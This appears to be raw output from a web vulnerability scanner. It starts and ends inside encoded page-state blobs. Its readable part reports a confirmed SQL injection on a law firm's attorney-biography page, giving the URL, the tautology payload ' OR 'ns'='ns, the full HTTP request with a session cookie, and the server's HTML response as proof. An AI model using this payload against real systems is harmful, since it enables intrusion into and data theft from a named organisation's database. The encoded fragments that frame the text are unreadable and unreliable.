GVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPlJvdXRlIDMgb3IgUm91dGUgMjE6IFw8L3N0cm9uZ1w+XDwvZm9vXD5cPGZvbyBzaXplPTJcPkZyb20gUnQuIDMsIHRha2UgUm91dGUgMjEgU291dGggYWJvdXQgNCBtaWxlcyBhbmQgdGhlbiBSb3V0ZSAyMSBiZWNvbWVzIGEgNC1sYW5lIG5vbi1kaXZpZGVkIGhpZ2h3YXkuIEZyb20gdGhpcyBwb2ludCwgcHJvY2VlZCAxJiMxODlcOyBtaWxlcyB0byB0aGUgaW50ZXJzZWN0aW9uIG9mIE1jQ2FydGVyIEhpZ2h3YXkvTWFya2V0IFN0cmVldC4gVHVybiByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkmbmJzcFw7IFByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIG1vdXRoIG9mIHRoZSByZWFyIGRyaXZld2F5IGVudHJhbmNlLiZuYnNwXDsoVGhlIGVudHJhbmNlIHRvIHRoZSZuYnNwXDtkcml2ZXdheSZuYnNwXDtpcyBsb2NhdGVkIGp1c3QmbmJzcFw7YmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDtBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPGJyXD5cPGJyXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPkZyb20gUGVubnN5bHZhbmlhIG9yIFdlc3Rlcm4gTkogdmlhIFJ0LiA4MCBFYXN0Olw8L3N0cm9uZ1w+XDwvZm9vXD5cPC9wXD4NClw8cFw+XDxmb28gc2l6ZT0yXD5Sb3V0ZSA4MCBFYXN0IG9udG8gUm91dGUgMjgwIEVhc3QuIFByb2NlZWQgYXBwcm94aW1hdGVseSAxNCBtaWxlcyB1bnRpbCBSb3V0ZSAyODAgZm9ya3MuIEZvbGxvdyBzaWducyB0YWtpbmcgSS0yODAgRWFzdC4gV2hlbiBSb3V0ZSAyODAgZm9ya3MgLS0gc3RheSByaWdodCwgZm9sbG93aW5nIHNpZ25zIGZvciBIYXJyaXNvbi4gRXhpdCBhdCAxNSAoUnQuIDIxIFNvdXRoLURvd250b3duKS4gUHJvY2VlZCB0byB0aGUgYm90dG9tIG9mIHRoZSByYW1wLiBUdXJuIHJpZ2h0IG9udG8gUnQuIDIxIChNY0NhcnRlciBIaWdod2F5KSBhbmQgcHJvY2VlZCAxIG1pbGUgdG8gdGhlJm5ic3BcO2ludGVyc2VjdGlvbiBvZiggTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IGF0IHRoZSBsaWdodCBvbnRvIChNYXJrZXQgU3RyZWV0KSZuYnNwXDsgUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDE1MCBmZWV0IHR1cm5pbmcgcmlnaHQgaW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuXDwvZm9vXD5cPC9wXD4NClw8cFw+XDxzdHJvbmdcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5Gcm9tIFBlbm5zeWx2YW5pYSBvciBXZXN0ZXJuIE5KIHZpYSBSdC4mbmJzcFw7NzggRWFzdDpcPC9mb29cPiBcPC9zdHJvbmdcPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIHNpemU9Mlw+XDxmb28gc2l6ZT0yXD5cPGZvbyBzaXplPTJcPlJ0XDwvZm9vXD5cPC9zbWFsbFw+LiA3OCBFYXN0LiBGb2xsb3cgc2lnbnMgZm9yIE5ld2FyayBBaXJwb3J0LCBFeGl0IDU3LiBGb2xsb3cgc2lnbnMgZm9yIGZvciBSb3V0ZSAyMSDigJMgTmV3YXJrLCZuYnNwXDtvdmVyIGJyaWRnZSBvbnRvIFJvdXRlIDIxIE5vcnRoIHdoaWNoIGJlY29tZXMgTWNDYXJ0ZXIgSGlnaHdheS4gUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDEmIzE4OVw7IG1pbGVzIHRvIHRoZSBpbnRlcnNlY3Rpb24gb2YgTWNDYXJ0ZXIgSGlnaHdheS9FZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBhdCB0aGUgbGlnaHQgb250byAoRWRpc29uIFBsYWNlKSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCZuYnNwXDt0cmFmZmljIGxpZ2h0IHdoaWNoIGlzIChNdWxiZXJyeSBTdHJlZXQpJm5ic3BcOyBNYWtlIGEgcmlnaHQgb250byAoTXVsYmVycnkgU3RyZWV0KSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBsaWdodCB3aGljaCBpcyAoTWFya2V0IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvJm5ic3BcOyhNYXJrZXQgU3RyZWV0KSBhbmQmbmJzcFw7YmVhciBkaWFnb25hbGx5IGFjcm9zcyB0b3dhcmRzIHlvdXIgbGVmdCB0byBnZXQgaW50byB5b3VyIGxlZnQgaGFuZCB0dXJuIGxhbmUuJm5ic3BcOyBNYWtlIGEgbGVmdCBpbnRvIHRoZSZuYnNwXDttb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IEEgc2VjdXJpdHkgb2ZmaWNlciB3aWxsIG1lZXQgeW91IGF0IHlvdXIgdmVoaWNsZSB0byZuYnNwXDtjaGVjayB5b3VyIHNlY3VyaXR5IGNyZWRlbnRpYWxzLiZuYnNwXDsgUGxlYXNlIHBhcmsgeW91ciB2ZWhpY2xlIGluIHRoZSBvdXRkb29yIHZpc2l0b3JzJyBwYXJraW5nIGxvdC4mbmJzcFw7IFBsZWFzZSBwcm9jZWVkIHRvIHRoZSAxNXRoIEZsb29yIFJlY2VwdGlvbiBEZXNrLCBHYXRld2F5IElWLiZuYnNwXDtcPC9mb29cPlw8L3NtYWxsXD5cPC9mb29cPlw8L3BcPlw8Zm9vIHNpemU9Mlw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gY29sb3I9IzAwMDA4MCBzaXplPTRcPlw8c3Ryb25nXD5Gcm9tIE5ldyBZb3JrIENpdHk6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBIb2xsYW5kIFR1bm5lbDogXDwvc3Ryb25nXD5UYWtlIHRoZSBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+SG9sbGFuZCBUdW5uZWwgdG8gTmV3IEplcnNleSBUdXJucGlrZSBOb3J0aCB0byBFeGl0IDE1VyAtIG9udG8gUm91dGUgMjgwIFdlc3QuIENvbnRpbnVlIGFwcHJveGltYXRlbHkgMiYjMTg5XDsgbWlsZXMgdG8gZXhpdCAxNSAtIFJvdXRlIDIxIFNvdXRoLU5ld2Fyay4gUHJvY2VlZGluZyBkb3duIGV4aXQgcmFtcCBzdGF5IHRvIHlvdXIgbGVmdCBmb2xsb3dpbmcgc2lnbnMgZm9yIFJ0LiAyMSBTb3V0aCBhbmQgdGhlIE4uIEouIFBlcmZvcm1pbmcgQXJ0cyBDZW50ZXIgKHNoYXJwIGN1cnZlIHRvIHRoZSBsZWZ0KSB0byBib3R0b20gb2YgcmFtcC4gVHVybiByaWdodCAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIGNvbnRpbnVlIGFwcHJveGltYXRlbHkgMSBtaWxlIHRvIGludGVyc2VjdGlvbiBvZiZuYnNwXDsoTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsmbmJzcFw7IE1ha2UgYSByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkgYW5kIHByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuJm5ic3BcO1w8L2Zvb1w+XDwvcFw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBMaW5jb2xuIFR1bm5lbDpcPC9zdHJvbmdcPiBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+Rm9sbG93IHNpZ25zIGZvciBOSiBUdXJucGlrZSBTb3V0aCB0byBFeGl0IDE1Vy1Sb3V0ZSAyODAgV2VzdC4gQ29udGludWUgYXBwcm94aW1hdGVseSAyJiMxODlcOyBtaWxlcyB0byBleGl0IDE1IC0gUm91dGUgMjEgU291dGgtTmV3YXJrLiBQcm9jZWVkaW5nIGRvd24gZXhpdCByYW1wIHN0YXkgdG8geW91ciBsZWZ0IGZvbGxvd2luZyBzaWducyBmb3IgUnQuIDIxIFNvdXRoIGFuZCB0aGUgTi4gSi4gUGVyZm9ybWluZyBBcnRzIENlbnRlciAoc2hhcnAgY3VydmUgdG8gdGhlIGxlZnQpIHRvIGJvdHRvbSBvZiByYW1wLiBUdXJuIHJpZ2h0IChNY0NhcnRlciBIaWdod2F5KSBhbmQgY29udGludWUgYXBwcm94aW1hdGVseSAxIG1pbGUgdG8gaW50ZXJzZWN0aW9uIG9mIChNY0NhcnRlciBIaWdod2F5L01hcmtldCBTdHJlZXQpLiZuYnNwXDsgTWFrZSBhIHJpZ2h0IG9udG8gKE1hcmtldCBTdHJlZXQpIGFuZCBwcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyByaWdodCBpbnRvIHRoZSBtb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGx..
- /new/showbionew.aspx

/new/showbionew.aspx CONFIRMED

http://www.mccarter.com/new/showbionew.aspx?show='+OR+'ns'%3d'ns&Related=3

Parameters

Parameter Type Value
show GET ' OR 'ns'='ns
Related GET 3

Request

GET /new/showbionew.aspx?show='+OR+'ns'%3d'ns&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&Show=1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26549



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>McCarter&amp;English | Michael Glasheen</title>
<META NAME="KEYWORDS" CONTENT="Michael,Glasheen,Michael Glasheen,Business & Financial Services Litigation" >
<META NAME="DESCRIPTION" CONTENT="Mr. Glasheen practices in the area of commercial litigation in federal and state trial and appellate courts with a current emphasis on life and disability carrier litigation.
Mr. Glasheen has represented insurance clients for 20 years. This experi">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">

P,TD,FONT,SPAN,DIV { COLOR: #666666; font-family: Arial; font-size: 11px; }
FONT { COLOR: #666666; font-family: Arial; font-size: 11px; }
A { text-decoration:none; }
A:Hover{ text-decoration:none; color:#000000; }
body { <!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;--> scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff; }
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="MARGIN-TOP:0px;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px">
<form name="Form1" method="post" action="showbionew.aspx?show='+OR+'ns'%3d'ns&amp;Related=3" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY+O2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPE1pY2hhZWwgR2xhc2hlZW47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxNRVRBIE5BTUU9IktFWVdPUkRTIiBDT05URU5UPSJNaWNoYWVsLEdsYXNoZWVuLE1pY2hhZWwgR2xhc2hlZW4sQnVzaW5lc3MgJiBGaW5hbmNpYWwgU2VydmljZXMgTGl0aWdhdGlvbiIgXD4gOz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iTXIuIEdsYXNoZWVuIHByYWN0aWNlcyBpbiB0aGUgYXJlYSBvZiBjb21tZXJjaWFsIGxpdGlnYXRpb24gaW4gZmVkZXJhbCBhbmQgc3RhdGUgdHJpYWwgYW5kIGFwcGVsbGF0ZSBjb3VydHMgd2l0aCBhIGN1cnJlbnQgZW1waGFzaXMgb24gbGlmZSBhbmQgZGlzYWJpbGl0eSBjYXJyaWVyIGxpdGlnYXRpb24uIA0KIE1yLiBHbGFzaGVlbiBoYXMgcmVwcmVzZW50ZWQgaW5zdXJhbmNlIGNsaWVudHMgZm9yIDIwIHllYXJzLiBUaGlzIGV4cGVyaSJcPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDEzPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw3PjtpPDk+O2k8MTE+O2k8MTM+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlBSQUNUSUNFU1w8L0JcPlw8QlJcPlw8L3NwYW5cPiBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE0Ilw+QnVzaW5lc3MgJiBGaW5hbmNpYWwgU2VydmljZXMgTGl0aWdhdGlvbiBcPC9hXD5cPEJSXD47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxzcGFuIHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5QUklOQ0lQQUwgSU5EVVNUUklFU1w8QlJcPlw8L3NwYW5cPiBcPGEgaHJlZj0ic2hvd2luZHVzdHJ5bmV3LmFzcHg/U2hvdz0xNDE4Ilw+RmluYW5jaWFsIEluc3RpdHV0aW9uc1w8L2FcPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHBcPk1yLiBHbGFzaGVlbiBwcmFjdGljZXMgaW4gdGhlIGFyZWEgb2YgY29tbWVyY2lhbCBsaXRpZ2F0aW9uIGluIGZlZGVyYWwgYW5kIHN0YXRlIHRyaWFsIGFuZCBhcHBlbGxhdGUgY291cnRzIHdpdGggYSBjdXJyZW50IGVtcGhhc2lzIG9uIGxpZmUgYW5kIGRpc2FiaWxpdHkgY2FycmllciBsaXRpZ2F0aW9uLlw8L3BcPg0KXDxwXD5Nci4gR2xhc2hlZW4gaGFzIHJlcHJlc2VudGVkIGluc3VyYW5jZSBjbGllbnRzIGZvciAyMCB5ZWFycy4gVGhpcyBleHBlcmllbmNlIGluY2x1ZGVzIGNvbnRyYWN0dWFsIGRpc3B1dGVzIGFuZCBjbGFpbXMgZGVjaXNpb25zLCBib3RoIHVuZGVyIEVSSVNBIGFuZCBpbmRpdmlkdWFsIHBvbGljaWVzXDsgc2FsZXMgcHJhY3RpY2VzIGxpdGlnYXRpb25cOyBtdWx0aS1kaXN0cmljdCBsaXRpZ2F0aW9uXDsgaW50ZXJwbGVhZGVyc1w7IHBvbGljeSByZXNjaXNzaW9uc1w7IGJyZWFjaCBvZiBub24tcG9saWN5IGNvbnRyYWN0cywgY2xhaW1zIGZvciBleHRyYS1jb250cmFjdHVhbCwgc3RhdHV0b3J5LCBiYWQgZmFpdGggYW5kIHB1bml0aXZlIGRhbWFnZXMsIGFuZCBGSU5SQSBhcmJpdHJhdGlvbnMuXDwvcFw+DQpcPHBcPkluIGEgcmVjZW50IHJlcHJlc2VudGF0aW9uLCBNci4gR2xhc2hlZW4gcmVwcmVzZW50ZWQgYW4gaW5zdXJlciBhbGxlZ2luZyB0aGF0IG9uZSBvZiBpdHMgYnJva2VycyBpbXByb3Blcmx5IGRlbGl2ZXJlZCBhIGxpZmUgaW5zdXJhbmNlIHBvbGljeS4gVGhlIHR3by13ZWVrIHRyaWFsIHJlc3VsdGVkIGluIGEgJDEuMiBtaWxsaW9uIGp1cnkgdmVyZGljdCBpbiBmYXZvciBvZiB0aGUgaW5zdXJlci5cPC9wXD4NClw8cFw+SW4gYSBzZWNvbmQgcmVwcmVzZW50YXRpb24sIE1yLiBHbGFzaGVlbiAtLSBpbiBhIGNhc2Ugb2YgYXBwYXJlbnQgZmlyc3QgaW1wcmVzc2lvbiAtLSBzdWNjZXNzZnVsbHkgZGVmZW5kZWQgYW4gaW5zdXJlciBhZ2FpbnN0IGF0dGVtcHRzIGJ5IGZhbWlseSBtZW1iZXJzIHRvIHVzZSBhICJjYXRhc3Ryb3BoaWMgZXZlbnRzIiBzdGF0dXRlIGVuYWN0ZWQgaW4gTmV3IEplcnNleSBpbiByZXNwb25zZSB0byB0aGUgZXZlbnRzIG9mIDkvMTEgdG8gc2VlayBhbiBlYXJseSBkZWNsYXJhdGlvbiBvZiBkZWF0aCB3aGVyZSB0aGUgaW5zdXJlZCBoYWQgZGlzYXBwZWFyZWQgd2hpbGUgaW4gdGhlIHZpY2luaXR5IG9mIGEgaHVycmljYW5lIGluIEZsb3JpZGEuXDwvcFw+DQpcPHBcPkluIGFub3RoZXIgcmVwcmVzZW50YXRpb24sIE1yLiBHbGFzaGVlbiBwZXJzdWFkZWQgdGhlIERpc3RyaWN0IENvdXJ0IHRoYXQgYSBub24tbWVtYmVyIG9mIHRoZSBOYXRpb25hbCBBc3NvY2lhdGlvbiBvZiBTZWN1cml0aWVzIERlYWxlcnMgY291bGQgZWl0aGVyIGNvbXBlbCBhIE5BU0QgYXJiaXRyYXRpb24gb3IgcGFydGljaXBhdGUgaW4gYSBOQVNEIGFyYml0cmF0aW9uIHRoYXQgaGFkIGJlZW4gY29tbWVuY2VkIGJ5IGEgc3Vic2lkaWFyeSwgTkFTRCBtZW1iZXIgY29tcGFueS4gQXMgcGFydCBvZiB0aGUgbGl0aWdhdGlvbiwgYW4gZW1lcmdlbmN5IG9yZGVyIHdhcyBvYnRhaW5lZCBmcm9tIHRoZSBVbml0ZWQgU3RhdGVzIENvdXJ0IG9mIEFwcGVhbHMgZm9yIHRoZSBUaGlyZCBDaXJjdWl0IHByZWNsdWRpbmcgbWVyaXRzIGRpc2NvdmVyeSB3aGlsZSB0aGUgQ291cnQgY29uc2lkZXJlZCB0aGUgYXJiaXRyYWJpbGl0eSBhbmQgZm9ydW0gaXNzdWVzLiBUaGUgcmVzdWx0IHdhcyB0aGF0IHRoZSBDb3VydCBncmFudGVkIHRoZSBDb21wYW55J3MgTW90aW9uIHRvIENvbXBlbCBBcmJpdHJhdGlvbiBhbmQgdG8gU3RheS4mbmJzcFw7IFRoZSBhcmJpdHJhdGlvbiBpdHNlbGYsIHBlcnRhaW5pbmcgdG8gY2xhaW1zIGJ5IHJlZ2lzdGVyZWQgcmVwcmVzZW50YXRpdmVzIGZvciBkZWZhbWF0aW9uLCB3cm9uZ2Z1bCBkaXNjaGFyZ2UsIGludGVudGlvbmFsIGludGVyZmVyZW5jZSB3aXRoIGVjb25vbWljIHJlbGF0aW9ucywgZnJhdWQsIGFuZCBvdGhlciB0b3J0cyAtLSBzZWVraW5nICQ1IG1pbGxpb24gaW4gY29tcGVuc2F0b3J5IGRhbWFnZXMgcGx1cyBwdW5pdGl2ZSBkYW1hZ2VzIC0tIHdhcyBzdWNjZXNzZnVsbHkgY29uY2x1ZGVkLiZuYnNwXDsgVGhlIHRyaWFsIGxhc3RlZCB0aHJlZSB3ZWVrcy5cPC9wXD4NClw8ZGl2XD5JbiBhbm90aGVyIHJlY2VudCBtYXR0ZXIsIE1yLiBHbGFzaGVlbiBvYnRhaW5lZCBzdW1tYXJ5IGp1ZGdtZW50IGluIGZhd